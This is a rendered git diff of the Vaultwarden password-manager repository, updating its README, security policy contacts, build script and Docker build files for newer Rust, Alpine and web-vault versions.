The maintainers work together to set the direction for the project, focusing on serving the self-hosting community, including individuals, families, and small organizations, while ensuring the project's sustainability.
|
||||||
</tr>
|
|
||||||
<tr>
|
**Please note:** We cannot be held liable for any data loss that may occur while using Vaultwarden. This includes passwords, attachments, and other information handled by the application. We highly recommend performing regular backups of your files and database. However, should you experience data loss, we encourage you to contact us immediately.
|
||||||
<td align="center">
|
|
||||||
<a href="https://github.com/numberly" style="width: 75px">
|
<br>
|
||||||
<sub><b>Numberly</b></sub>
|
|
||||||
</a>
|
## Bitwarden_RS
|
||||||
</td>
|
|
||||||
</tr>
|
This project was known as Bitwarden_RS and has been renamed to separate itself from the official Bitwarden server in the hopes of avoiding confusion and trademark/branding issues.<br>
|
||||||
<tr>
|
Please see [#1642 - v1.21.0 release and project rename to Vaultwarden](https://github.com/dani-garcia/vaultwarden/discussions/1642) for more explanation.
|
||||||
<td align="center">
|
|
||||||
<a href="https://github.com/IQ333777" style="width: 75px">
|
|
||||||
<sub><b>IQ333777</b></sub>
|
|
||||||
</a>
|
|
||||||
</td>
|
|
||||||
</tr>
|
|
||||||
</table>
|
|
||||||
|
|||||||
14
SECURITY.md
14
SECURITY.md
@@ -21,7 +21,7 @@ notify us. We welcome working with you to resolve the issue promptly. Thanks in
|
|||||||
The following bug classes are out-of scope:
|
The following bug classes are out-of scope:
|
||||||
|
|
||||||
- Bugs that are already reported on Vaultwarden's issue tracker (https://github.com/dani-garcia/vaultwarden/issues)
|
- Bugs that are already reported on Vaultwarden's issue tracker (https://github.com/dani-garcia/vaultwarden/issues)
|
||||||
- Bugs that are not part of Vaultwarden, like on the the web-vault or mobile and desktop clients. These issues need to be reported in the respective project issue tracker at https://github.com/bitwarden to which we are not associated
|
- Bugs that are not part of Vaultwarden, like on the web-vault or mobile and desktop clients. These issues need to be reported in the respective project issue tracker at https://github.com/bitwarden to which we are not associated
|
||||||
- Issues in an upstream software dependency (ex: Rust, or External Libraries) which are already reported to the upstream maintainer
|
- Issues in an upstream software dependency (ex: Rust, or External Libraries) which are already reported to the upstream maintainer
|
||||||
- Attacks requiring physical access to a user's device
|
- Attacks requiring physical access to a user's device
|
||||||
- Issues related to software or protocols not under Vaultwarden's control
|
- Issues related to software or protocols not under Vaultwarden's control
|
||||||
@@ -39,7 +39,11 @@ Thank you for helping keep Vaultwarden and our users safe!
|
|||||||
|
|
||||||
# How to contact us
|
# How to contact us
|
||||||
|
|
||||||
- You can contact us on Matrix https://matrix.to/#/#vaultwarden:matrix.org (user: `@danig:matrix.org`)
|
- You can contact us on Matrix https://matrix.to/#/#vaultwarden:matrix.org (users: `@danig:matrix.org` and/or `@blackdex:matrix.org`)
|
||||||
- You can send an  to report a security issue.
|
- You can send an  to report a security issue.<br>
|
||||||
- If you want to send an encrypted email you can use the following GPG key:<br>
|
If you want to send an encrypted email you can use the following GPG key: 13BB3A34C9E380258CE43D595CB150B31F6426BC<br>
|
||||||
https://keyserver.ubuntu.com/pks/lookup?search=0xB9B7A108373276BF3C0406F9FC8A7D14C3CD543A&fingerprint=on&op=index
|
It can be found on several public GPG key servers.<br>
|
||||||
|
* https://keys.openpgp.org/search?q=security%40vaultwarden.org
|
||||||
|
* https://keys.mailvelope.com/pks/lookup?op=get&search=security%40vaultwarden.org
|
||||||
|
* https://pgpkeys.eu/pks/lookup?search=security%40vaultwarden.org&fingerprint=on&op=index
|
||||||
|
* https://keyserver.ubuntu.com/pks/lookup?search=security%40vaultwarden.org&fingerprint=on&op=index
|
||||||
|
|||||||
14
build.rs
14
build.rs
@@ -11,12 +11,22 @@ fn main() {
|
|||||||
println!("cargo:rustc-cfg=postgresql");
|
println!("cargo:rustc-cfg=postgresql");
|
||||||
#[cfg(feature = "query_logger")]
|
#[cfg(feature = "query_logger")]
|
||||||
println!("cargo:rustc-cfg=query_logger");
|
println!("cargo:rustc-cfg=query_logger");
|
||||||
|
#[cfg(feature = "s3")]
|
||||||
|
println!("cargo:rustc-cfg=s3");
|
||||||
|
|
||||||
#[cfg(not(any(feature = "sqlite", feature = "mysql", feature = "postgresql")))]
|
#[cfg(not(any(feature = "sqlite", feature = "mysql", feature = "postgresql")))]
|
||||||
compile_error!(
|
compile_error!(
|
||||||
"You need to enable one DB backend. To build with previous defaults do: cargo build --features sqlite"
|
"You need to enable one DB backend. To build with previous defaults do: cargo build --features sqlite"
|
||||||
);
|
);
|
||||||
|
|
||||||
|
// Use check-cfg to let cargo know which cfg's we define,
|
||||||
|
// and avoid warnings when they are used in the code.
|
||||||
|
println!("cargo::rustc-check-cfg=cfg(sqlite)");
|
||||||
|
println!("cargo::rustc-check-cfg=cfg(mysql)");
|
||||||
|
println!("cargo::rustc-check-cfg=cfg(postgresql)");
|
||||||
|
println!("cargo::rustc-check-cfg=cfg(query_logger)");
|
||||||
|
println!("cargo::rustc-check-cfg=cfg(s3)");
|
||||||
|
|
||||||
// Rerun when these paths are changed.
|
// Rerun when these paths are changed.
|
||||||
// Someone could have checked-out a tag or specific commit, but no other files changed.
|
// Someone could have checked-out a tag or specific commit, but no other files changed.
|
||||||
println!("cargo:rerun-if-changed=.git");
|
println!("cargo:rerun-if-changed=.git");
|
||||||
@@ -41,8 +51,8 @@ fn main() {
|
|||||||
fn run(args: &[&str]) -> Result<String, std::io::Error> {
|
fn run(args: &[&str]) -> Result<String, std::io::Error> {
|
||||||
let out = Command::new(args[0]).args(&args[1..]).output()?;
|
let out = Command::new(args[0]).args(&args[1..]).output()?;
|
||||||
if !out.status.success() {
|
if !out.status.success() {
|
||||||
use std::io::{Error, ErrorKind};
|
use std::io::Error;
|
||||||
return Err(Error::new(ErrorKind::Other, "Command not successful"));
|
return Err(Error::other("Command not successful"));
|
||||||
}
|
}
|
||||||
Ok(String::from_utf8(out.stdout).unwrap().trim().to_string())
|
Ok(String::from_utf8(out.stdout).unwrap().trim().to_string())
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -1,12 +1,13 @@
|
|||||||
---
|
---
|
||||||
vault_version: "v2024.1.2b"
|
vault_version: "v2025.7.0"
|
||||||
vault_image_digest: "sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08"
|
vault_image_digest: "sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e"
|
||||||
# Cross Compile Docker Helper Scripts v1.3.0
|
# Cross Compile Docker Helper Scripts v1.6.1
|
||||||
# We use the linux/amd64 platform shell scripts since there is no difference between the different platform scripts
|
# We use the linux/amd64 platform shell scripts since there is no difference between the different platform scripts
|
||||||
xx_image_digest: "sha256:c9609ace652bbe51dd4ce90e0af9d48a4590f1214246da5bc70e46f6dd586edc"
|
# https://github.com/tonistiigi/xx | https://hub.docker.com/r/tonistiigi/xx/tags
|
||||||
rust_version: 1.76.0 # Rust version to be used
|
xx_image_digest: "sha256:9c207bead753dda9430bdd15425c6518fc7a03d866103c516a2c6889188f5894"
|
||||||
|
rust_version: 1.88.0 # Rust version to be used
|
||||||
debian_version: bookworm # Debian release name to be used
|
debian_version: bookworm # Debian release name to be used
|
||||||
alpine_version: 3.19 # Alpine version to be used
|
alpine_version: "3.22" # Alpine version to be used
|
||||||
# For which platforms/architectures will we try to build images
|
# For which platforms/architectures will we try to build images
|
||||||
platforms: ["linux/amd64", "linux/arm64", "linux/arm/v7", "linux/arm/v6"]
|
platforms: ["linux/amd64", "linux/arm64", "linux/arm/v7", "linux/arm/v6"]
|
||||||
# Determine the build images per OS/Arch
|
# Determine the build images per OS/Arch
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
# syntax=docker/dockerfile:1
|
# syntax=docker/dockerfile:1
|
||||||
|
# check=skip=FromPlatformFlagConstDisallowed,RedundantTargetPlatform
|
||||||
|
|
||||||
# This file was generated using a Jinja2 template.
|
# This file was generated using a Jinja2 template.
|
||||||
# Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
|
# Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
|
||||||
@@ -18,27 +19,27 @@
|
|||||||
# - From https://hub.docker.com/r/vaultwarden/web-vault/tags,
|
# - From https://hub.docker.com/r/vaultwarden/web-vault/tags,
|
||||||
# click the tag name to view the digest of the image it currently points to.
|
# click the tag name to view the digest of the image it currently points to.
|
||||||
# - From the command line:
|
# - From the command line:
|
||||||
# $ docker pull docker.io/vaultwarden/web-vault:v2024.1.2b
|
# $ docker pull docker.io/vaultwarden/web-vault:v2025.7.0
|
||||||
# $ docker image inspect --format "{{.RepoDigests}}" docker.io/vaultwarden/web-vault:v2024.1.2b
|
# $ docker image inspect --format "{{.RepoDigests}}" docker.io/vaultwarden/web-vault:v2025.7.0
|
||||||
# [docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08]
|
# [docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e]
|
||||||
#
|
#
|
||||||
# - Conversely, to get the tag name from the digest:
|
# - Conversely, to get the tag name from the digest:
|
||||||
# $ docker image inspect --format "{{.RepoTags}}" docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08
|
# $ docker image inspect --format "{{.RepoTags}}" docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e
|
||||||
# [docker.io/vaultwarden/web-vault:v2024.1.2b]
|
# [docker.io/vaultwarden/web-vault:v2025.7.0]
|
||||||
#
|
#
|
||||||
FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08 as vault
|
FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e AS vault
|
||||||
|
|
||||||
########################## ALPINE BUILD IMAGES ##########################
|
########################## ALPINE BUILD IMAGES ##########################
|
||||||
## NOTE: The Alpine Base Images do not support other platforms then linux/amd64
|
## NOTE: The Alpine Base Images do not support other platforms then linux/amd64
|
||||||
## And for Alpine we define all build images here, they will only be loaded when actually used
|
## And for Alpine we define all build images here, they will only be loaded when actually used
|
||||||
FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:x86_64-musl-stable-1.76.0 as build_amd64
|
FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:x86_64-musl-stable-1.88.0 AS build_amd64
|
||||||
FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:aarch64-musl-stable-1.76.0 as build_arm64
|
FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:aarch64-musl-stable-1.88.0 AS build_arm64
|
||||||
FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:armv7-musleabihf-stable-1.76.0 as build_armv7
|
FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:armv7-musleabihf-stable-1.88.0 AS build_armv7
|
||||||
FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:arm-musleabi-stable-1.76.0 as build_armv6
|
FROM --platform=linux/amd64 ghcr.io/blackdex/rust-musl:arm-musleabi-stable-1.88.0 AS build_armv6
|
||||||
|
|
||||||
########################## BUILD IMAGE ##########################
|
########################## BUILD IMAGE ##########################
|
||||||
# hadolint ignore=DL3006
|
# hadolint ignore=DL3006
|
||||||
FROM --platform=linux/amd64 build_${TARGETARCH}${TARGETVARIANT} as build
|
FROM --platform=linux/amd64 build_${TARGETARCH}${TARGETVARIANT} AS build
|
||||||
ARG TARGETARCH
|
ARG TARGETARCH
|
||||||
ARG TARGETVARIANT
|
ARG TARGETVARIANT
|
||||||
ARG TARGETPLATFORM
|
ARG TARGETPLATFORM
|
||||||
@@ -58,33 +59,30 @@ ENV DEBIAN_FRONTEND=noninteractive \
|
|||||||
|
|
||||||
|
|
||||||
# Create CARGO_HOME folder and don't download rust docs
|
# Create CARGO_HOME folder and don't download rust docs
|
||||||
RUN mkdir -pv "${CARGO_HOME}" \
|
RUN mkdir -pv "${CARGO_HOME}" && \
|
||||||
&& rustup set profile minimal
|
rustup set profile minimal
|
||||||
|
|
||||||
# Creates a dummy project used to grab dependencies
|
# Creates a dummy project used to grab dependencies
|
||||||
RUN USER=root cargo new --bin /app
|
RUN USER=root cargo new --bin /app
|
||||||
WORKDIR /app
|
WORKDIR /app
|
||||||
|
|
||||||
# Shared variables across Debian and Alpine
|
# Environment variables for Cargo on Alpine based builds
|
||||||
RUN echo "export CARGO_TARGET=${RUST_MUSL_CROSS_TARGET}" >> /env-cargo && \
|
RUN echo "export CARGO_TARGET=${RUST_MUSL_CROSS_TARGET}" >> /env-cargo && \
|
||||||
# To be able to build the armv6 image with mimalloc we need to tell the linker to also look for libatomic
|
|
||||||
if [[ "${TARGETARCH}${TARGETVARIANT}" == "armv6" ]] ; then echo "export RUSTFLAGS='-Clink-arg=-latomic'" >> /env-cargo ; fi && \
|
|
||||||
# Output the current contents of the file
|
# Output the current contents of the file
|
||||||
cat /env-cargo
|
cat /env-cargo
|
||||||
|
|
||||||
# Enable MiMalloc to improve performance on Alpine builds
|
|
||||||
ARG DB=sqlite,mysql,postgresql,enable_mimalloc
|
|
||||||
|
|
||||||
RUN source /env-cargo && \
|
RUN source /env-cargo && \
|
||||||
rustup target add "${CARGO_TARGET}"
|
rustup target add "${CARGO_TARGET}"
|
||||||
|
|
||||||
ARG CARGO_PROFILE=release
|
|
||||||
ARG VW_VERSION
|
|
||||||
|
|
||||||
# Copies over *only* your manifests and build files
|
# Copies over *only* your manifests and build files
|
||||||
COPY ./Cargo.* ./
|
COPY ./Cargo.* ./rust-toolchain.toml ./build.rs ./
|
||||||
COPY ./rust-toolchain.toml ./rust-toolchain.toml
|
COPY ./macros ./macros
|
||||||
COPY ./build.rs ./build.rs
|
|
||||||
|
ARG CARGO_PROFILE=release
|
||||||
|
|
||||||
|
# Configure the DB ARG as late as possible to not invalidate the cached layers above
|
||||||
|
# Enable MiMalloc to improve performance on Alpine builds
|
||||||
|
ARG DB=sqlite,mysql,postgresql,enable_mimalloc
|
||||||
|
|
||||||
# Builds your dependencies and removes the
|
# Builds your dependencies and removes the
|
||||||
# dummy project, except the target folder
|
# dummy project, except the target folder
|
||||||
@@ -97,6 +95,8 @@ RUN source /env-cargo && \
|
|||||||
# To avoid copying unneeded files, use .dockerignore
|
# To avoid copying unneeded files, use .dockerignore
|
||||||
COPY . .
|
COPY . .
|
||||||
|
|
||||||
|
ARG VW_VERSION
|
||||||
|
|
||||||
# Builds again, this time it will be the actual source files being build
|
# Builds again, this time it will be the actual source files being build
|
||||||
RUN source /env-cargo && \
|
RUN source /env-cargo && \
|
||||||
# Make sure that we actually build the project by updating the src/main.rs timestamp
|
# Make sure that we actually build the project by updating the src/main.rs timestamp
|
||||||
@@ -127,7 +127,7 @@ RUN source /env-cargo && \
|
|||||||
# To uninstall: docker run --privileged --rm tonistiigi/binfmt --uninstall 'qemu-*'
|
# To uninstall: docker run --privileged --rm tonistiigi/binfmt --uninstall 'qemu-*'
|
||||||
#
|
#
|
||||||
# We need to add `--platform` here, because of a podman bug: https://github.com/containers/buildah/issues/4742
|
# We need to add `--platform` here, because of a podman bug: https://github.com/containers/buildah/issues/4742
|
||||||
FROM --platform=$TARGETPLATFORM docker.io/library/alpine:3.19
|
FROM --platform=$TARGETPLATFORM docker.io/library/alpine:3.22
|
||||||
|
|
||||||
ENV ROCKET_PROFILE="release" \
|
ENV ROCKET_PROFILE="release" \
|
||||||
ROCKET_ADDRESS=0.0.0.0 \
|
ROCKET_ADDRESS=0.0.0.0 \
|
||||||
@@ -144,14 +144,12 @@ RUN mkdir /data && \
|
|||||||
|
|
||||||
VOLUME /data
|
VOLUME /data
|
||||||
EXPOSE 80
|
EXPOSE 80
|
||||||
EXPOSE 3012
|
|
||||||
|
|
||||||
# Copies the files from the context (Rocket.toml file and web-vault)
|
# Copies the files from the context (Rocket.toml file and web-vault)
|
||||||
# and the binary from the "build" stage to the current stage
|
# and the binary from the "build" stage to the current stage
|
||||||
WORKDIR /
|
WORKDIR /
|
||||||
|
|
||||||
COPY docker/healthcheck.sh /healthcheck.sh
|
COPY docker/healthcheck.sh docker/start.sh /
|
||||||
COPY docker/start.sh /start.sh
|
|
||||||
|
|
||||||
COPY --from=vault /web-vault ./web-vault
|
COPY --from=vault /web-vault ./web-vault
|
||||||
COPY --from=build /app/target/final/vaultwarden .
|
COPY --from=build /app/target/final/vaultwarden .
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
# syntax=docker/dockerfile:1
|
# syntax=docker/dockerfile:1
|
||||||
|
# check=skip=FromPlatformFlagConstDisallowed,RedundantTargetPlatform
|
||||||
|
|
||||||
# This file was generated using a Jinja2 template.
|
# This file was generated using a Jinja2 template.
|
||||||
# Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
|
# Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
|
||||||
@@ -18,24 +19,24 @@
|
|||||||
# - From https://hub.docker.com/r/vaultwarden/web-vault/tags,
|
# - From https://hub.docker.com/r/vaultwarden/web-vault/tags,
|
||||||
# click the tag name to view the digest of the image it currently points to.
|
# click the tag name to view the digest of the image it currently points to.
|
||||||
# - From the command line:
|
# - From the command line:
|
||||||
# $ docker pull docker.io/vaultwarden/web-vault:v2024.1.2b
|
# $ docker pull docker.io/vaultwarden/web-vault:v2025.7.0
|
||||||
# $ docker image inspect --format "{{.RepoDigests}}" docker.io/vaultwarden/web-vault:v2024.1.2b
|
# $ docker image inspect --format "{{.RepoDigests}}" docker.io/vaultwarden/web-vault:v2025.7.0
|
||||||
# [docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08]
|
# [docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e]
|
||||||
#
|
#
|
||||||
# - Conversely, to get the tag name from the digest:
|
# - Conversely, to get the tag name from the digest:
|
||||||
# $ docker image inspect --format "{{.RepoTags}}" docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08
|
# $ docker image inspect --format "{{.RepoTags}}" docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e
|
||||||
# [docker.io/vaultwarden/web-vault:v2024.1.2b]
|
# [docker.io/vaultwarden/web-vault:v2025.7.0]
|
||||||
#
|
#
|
||||||
FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@sha256:798c0c893b6d16728878ff280b49da08863334d1f8dd88895580dc3dba622f08 as vault
|
FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@sha256:f6ac819a2cd9e226f2cd2ec26196ede94a41e672e9672a11b5f307a19278b15e AS vault
|
||||||
|
|
||||||
########################## Cross Compile Docker Helper Scripts ##########################
|
########################## Cross Compile Docker Helper Scripts ##########################
|
||||||
## We use the linux/amd64 no matter which Build Platform, since these are all bash scripts
|
## We use the linux/amd64 no matter which Build Platform, since these are all bash scripts
|
||||||
## And these bash scripts do not have any significant difference if at all
|
## And these bash scripts do not have any significant difference if at all
|
||||||
FROM --platform=linux/amd64 docker.io/tonistiigi/xx@sha256:c9609ace652bbe51dd4ce90e0af9d48a4590f1214246da5bc70e46f6dd586edc AS xx
|
FROM --platform=linux/amd64 docker.io/tonistiigi/xx@sha256:9c207bead753dda9430bdd15425c6518fc7a03d866103c516a2c6889188f5894 AS xx
|
||||||
|
|
||||||
########################## BUILD IMAGE ##########################
|
########################## BUILD IMAGE ##########################
|
||||||
# hadolint ignore=DL3006
|
# hadolint ignore=DL3006
|
||||||
FROM --platform=$BUILDPLATFORM docker.io/library/rust:1.76.0-slim-bookworm as build
|
FROM --platform=$BUILDPLATFORM docker.io/library/rust:1.88.0-slim-bookworm AS build
|
||||||
COPY --from=xx / /
|
COPY --from=xx / /
|
||||||
ARG TARGETARCH
|
ARG TARGETARCH
|
||||||
ARG TARGETVARIANT
|
ARG TARGETVARIANT
|
||||||
@@ -64,10 +65,7 @@ RUN apt-get update && \
|
|||||||
"libc6-$(xx-info debian-arch)-cross" \
|
"libc6-$(xx-info debian-arch)-cross" \
|
||||||
"libc6-dev-$(xx-info debian-arch)-cross" \
|
"libc6-dev-$(xx-info debian-arch)-cross" \
|
||||||
"linux-libc-dev-$(xx-info debian-arch)-cross" && \
|
"linux-libc-dev-$(xx-info debian-arch)-cross" && \
|
||||||
# Run xx-cargo early, since it sometimes seems to break when run at a later stage
|
xx-apt-get install -y \
|
||||||
echo "export CARGO_TARGET=$(xx-cargo --print-target-triple)" >> /env-cargo
|
|
||||||
|
|
||||||
RUN xx-apt-get install -y \
|
|
||||||
--no-install-recommends \
|
--no-install-recommends \
|
||||||
gcc \
|
gcc \
|
||||||
libmariadb3 \
|
libmariadb3 \
|
||||||
@@ -78,44 +76,52 @@ RUN xx-apt-get install -y \
|
|||||||
# Force install arch dependend mariadb dev packages
|
# Force install arch dependend mariadb dev packages
|
||||||
# Installing them the normal way breaks several other packages (again)
|
# Installing them the normal way breaks several other packages (again)
|
||||||
apt-get download "libmariadb-dev-compat:$(xx-info debian-arch)" "libmariadb-dev:$(xx-info debian-arch)" && \
|
apt-get download "libmariadb-dev-compat:$(xx-info debian-arch)" "libmariadb-dev:$(xx-info debian-arch)" && \
|
||||||
dpkg --force-all -i ./libmariadb-dev*.deb
|
dpkg --force-all -i ./libmariadb-dev*.deb && \
|
||||||
|
# Run xx-cargo early, since it sometimes seems to break when run at a later stage
|
||||||
|
echo "export CARGO_TARGET=$(xx-cargo --print-target-triple)" >> /env-cargo
|
||||||
|
|
||||||
# Create CARGO_HOME folder and don't download rust docs
|
# Create CARGO_HOME folder and don't download rust docs
|
||||||
RUN mkdir -pv "${CARGO_HOME}" \
|
RUN mkdir -pv "${CARGO_HOME}" && \
|
||||||
&& rustup set profile minimal
|
rustup set profile minimal
|
||||||
|
|
||||||
# Creates a dummy project used to grab dependencies
|
# Creates a dummy project used to grab dependencies
|
||||||
RUN USER=root cargo new --bin /app
|
RUN USER=root cargo new --bin /app
|
||||||
WORKDIR /app
|
WORKDIR /app
|
||||||
|
|
||||||
# Environment variables for cargo across Debian and Alpine
|
# Environment variables for Cargo on Debian based builds
|
||||||
|
ARG TARGET_PKG_CONFIG_PATH
|
||||||
|
|
||||||
RUN source /env-cargo && \
|
RUN source /env-cargo && \
|
||||||
if xx-info is-cross ; then \
|
if xx-info is-cross ; then \
|
||||||
# We can't use xx-cargo since that uses clang, which doesn't work for our libraries.
|
# We can't use xx-cargo since that uses clang, which doesn't work for our libraries.
|
||||||
# Because of this we generate the needed environment variables here which we can load in the needed steps.
|
# Because of this we generate the needed environment variables here which we can load in the needed steps.
|
||||||
echo "export CC_$(echo "${CARGO_TARGET}" | tr '[:upper:]' '[:lower:]' | tr - _)=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
|
echo "export CC_$(echo "${CARGO_TARGET}" | tr '[:upper:]' '[:lower:]' | tr - _)=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
|
||||||
echo "export CARGO_TARGET_$(echo "${CARGO_TARGET}" | tr '[:lower:]' '[:upper:]' | tr - _)_LINKER=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
|
echo "export CARGO_TARGET_$(echo "${CARGO_TARGET}" | tr '[:lower:]' '[:upper:]' | tr - _)_LINKER=/usr/bin/$(xx-info)-gcc" >> /env-cargo && \
|
||||||
echo "export PKG_CONFIG=/usr/bin/$(xx-info)-pkg-config" >> /env-cargo && \
|
|
||||||
echo "export CROSS_COMPILE=1" >> /env-cargo && \
|
echo "export CROSS_COMPILE=1" >> /env-cargo && \
|
||||||
echo "export OPENSSL_INCLUDE_DIR=/usr/include/$(xx-info)" >> /env-cargo && \
|
echo "export PKG_CONFIG_ALLOW_CROSS=1" >> /env-cargo && \
|
||||||
echo "export OPENSSL_LIB_DIR=/usr/lib/$(xx-info)" >> /env-cargo ; \
|
# For some architectures `xx-info` returns a triple which doesn't matches the path on disk
|
||||||
|
# In those cases you can override this by setting the `TARGET_PKG_CONFIG_PATH` build-arg
|
||||||
|
if [[ -n "${TARGET_PKG_CONFIG_PATH}" ]]; then \
|
||||||
|
echo "export TARGET_PKG_CONFIG_PATH=${TARGET_PKG_CONFIG_PATH}" >> /env-cargo ; \
|
||||||
|
else \
|
||||||
|
echo "export PKG_CONFIG_PATH=/usr/lib/$(xx-info)/pkgconfig" >> /env-cargo ; \
|
||||||
|
fi && \
|
||||||
|
echo "# End of env-cargo" >> /env-cargo ; \
|
||||||
fi && \
|
fi && \
|
||||||
# Output the current contents of the file
|
# Output the current contents of the file
|
||||||
cat /env-cargo
|
cat /env-cargo
|
||||||
|
|
||||||
# Configure the DB ARG as late as possible to not invalidate the cached layers above
|
|
||||||
ARG DB=sqlite,mysql,postgresql
|
|
||||||
|
|
||||||
RUN source /env-cargo && \
|
RUN source /env-cargo && \
|
||||||
rustup target add "${CARGO_TARGET}"
|
rustup target add "${CARGO_TARGET}"
|
||||||
|
|
||||||
ARG CARGO_PROFILE=release
|
|
||||||
ARG VW_VERSION
|
|
||||||
|
|
||||||
# Copies over *only* your manifests and build files
|
# Copies over *only* your manifests and build files
|
||||||
COPY ./Cargo.* ./
|
COPY ./Cargo.* ./rust-toolchain.toml ./build.rs ./
|
||||||
COPY ./rust-toolchain.toml ./rust-toolchain.toml
|
COPY ./macros ./macros
|
||||||
COPY ./build.rs ./build.rs
|
|
||||||
|
ARG CARGO_PROFILE=release
|
||||||
|
|
||||||
|
# Configure the DB ARG as late as possible to not invalidate the cached layers above
|
||||||
|
ARG DB=sqlite,mysql,postgresql
|
||||||
|
|
||||||
# Builds your dependencies and removes the
|
# Builds your dependencies and removes the
|
||||||
# dummy project, except the target folder
|
# dummy project, except the target folder
|
||||||
@@ -128,6 +134,8 @@ RUN source /env-cargo && \
|
|||||||
# To avoid copying unneeded files, use .dockerignore
|
# To avoid copying unneeded files, use .dockerignore
|
||||||
COPY . .
|
COPY . .
|
||||||
|
|
||||||
|
ARG VW_VERSION
|
||||||
|
|
||||||
# Builds again, this time it will be the actual source files being build
|
# Builds again, this time it will be the actual source files being build
|
||||||
RUN source /env-cargo && \
|
RUN source /env-cargo && \
|
||||||
# Make sure that we actually build the project by updating the src/main.rs timestamp
|
# Make sure that we actually build the project by updating the src/main.rs timestamp
|
||||||
@@ -179,14 +187,12 @@ RUN mkdir /data && \
|
|||||||
|
|
||||||
VOLUME /data
|
VOLUME /data
|
||||||
EXPOSE 80
|
EXPOSE 80
|
||||||
EXPOSE 3012
|
|
||||||
|
|
||||||
# Copies the files from the context (Rocket.toml file and web-vault)
|
# Copies the files from the context (Rocket.toml file and web-vault)
|
||||||
# and the binary from the "build" stage to the current stage
|
# and the binary from the "build" stage to the current stage
|
||||||
WORKDIR /
|
WORKDIR /
|
||||||
|
|
||||||
COPY docker/healthcheck.sh /healthcheck.sh
|
COPY docker/healthcheck.sh docker/start.sh /
|
||||||
COPY docker/start.sh /start.sh
|
|
||||||
|
|
||||||
COPY --from=vault /web-vault ./web-vault
|
COPY --from=vault /web-vault ./web-vault
|
||||||
COPY --from=build /app/target/final/vaultwarden .
|
COPY --from=build /app/target/final/vaultwarden .
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
# syntax=docker/dockerfile:1
|
# syntax=docker/dockerfile:1
|
||||||
|
# check=skip=FromPlatformFlagConstDisallowed,RedundantTargetPlatform
|
||||||
|
|
||||||
# This file was generated using a Jinja2 template.
|
# This file was generated using a Jinja2 template.
|
||||||
# Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
|
# Please make your changes in `DockerSettings.yaml` or `Dockerfile.j2` and then `make`
|
||||||
@@ -26,7 +27,7 @@
|
|||||||
# $ docker image inspect --format "{{ '{{' }}.RepoTags}}" docker.io/vaultwarden/web-vault@{{ vault_image_digest }}
|
# $ docker image inspect --format "{{ '{{' }}.RepoTags}}" docker.io/vaultwarden/web-vault@{{ vault_image_digest }}
|
||||||
# [docker.io/vaultwarden/web-vault:{{ vault_version }}]
|
# [docker.io/vaultwarden/web-vault:{{ vault_version }}]
|
||||||
#
|
#
|
||||||
FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@{{ vault_image_digest }} as vault
|
FROM --platform=linux/amd64 docker.io/vaultwarden/web-vault@{{ vault_image_digest }} AS vault
|
||||||
|
|
||||||
{% if base == "debian" %}
|
{% if base == "debian" %}
|
||||||
########################## Cross Compile Docker Helper Scripts ##########################
|
########################## Cross Compile Docker Helper Scripts ##########################
|
||||||
@@ -38,13 +39,13 @@ FROM --platform=linux/amd64 docker.io/tonistiigi/xx@{{ xx_image_digest }} AS xx
|
|||||||
## NOTE: The Alpine Base Images do not support other platforms then linux/amd64
|
## NOTE: The Alpine Base Images do not support other platforms then linux/amd64
|
||||||
## And for Alpine we define all build images here, they will only be loaded when actually used
|
## And for Alpine we define all build images here, they will only be loaded when actually used
|
||||||
{% for arch in build_stage_image[base].arch_image %}
|
{% for arch in build_stage_image[base].arch_image %}
|
||||||
FROM --platform={{ build_stage_image[base].platform }} {{ build_stage_image[base].arch_image[arch] }} as build_{{ arch }}
|
FROM --platform={{ build_stage_image[base].platform }} {{ build_stage_image[base].arch_image[arch] }} AS build_{{ arch }}
|
||||||
{% endfor %}
|
{% endfor %}
|
||||||
{% endif %}
|
{% endif %}
|
||||||
|
|
||||||
########################## BUILD IMAGE ##########################
|
########################## BUILD IMAGE ##########################
|
||||||
# hadolint ignore=DL3006
|
